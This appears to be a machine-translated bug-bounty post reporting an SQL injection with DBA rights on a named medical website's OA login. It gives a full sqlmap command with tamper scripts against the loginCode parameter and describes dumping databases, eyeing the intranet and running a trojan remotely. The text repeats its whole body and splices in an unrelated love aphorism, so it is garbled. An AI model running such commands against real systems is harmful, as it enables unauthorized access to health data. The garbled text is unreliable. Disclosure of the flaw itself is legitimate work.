Medical inquiry a website has the SQL Injection Vulnerability (DBA permission)

Medical inquiry a website has the SQL Injection Vulnerability (DBA permission)

I want to explain to you what is "Single Love". The so-called "Single Love" means that you have sentenced me to the final death penalty in your heart, and I have sentenced you to life imprisonment!

Vulnerability address:

Http://oa.xywy.com/
 

We will capture packets and modify the user name
 

And then drop the ing sqlmap.
 

sqlmap.py -r 4.txt --tamper space2comment.py,base64encode.py -p loginCode --level 5 --risk 3 --dbms mssql --dbs

Database
 

This permission looks comfortable.
 

View ip
 

Let's go to the Intranet ..

Well, you don't have a server in your hand. Otherwise, you can try to download and run the trojan remotely ..

Let's look at the table segment.
 

More than 1000. Well, Baidu gold and the software database dictionary did not find logon.



Large Review

Will there be high scores? Will it go to the homepage?

Vulnerability address:

Http://oa.xywy.com/
 

We will capture packets and modify the user name
 

And then drop the ing sqlmap.
 

sqlmap.py -r 4.txt --tamper space2comment.py,base64encode.py -p loginCode --level 5 --risk 3 --dbms mssql --dbs

Database
 

This permission looks comfortable.
 

View ip
 

Let's go to the Intranet ..

Well, you don't have a server in your hand. Otherwise, you can try to download and run the trojan remotely ..

Let's look at the table segment.
 

More than 1000. Well, Baidu gold and the software database dictionary did not find logon.



Large Review

Will there be high scores? Will it go to the homepage?

Solution:

You are more professional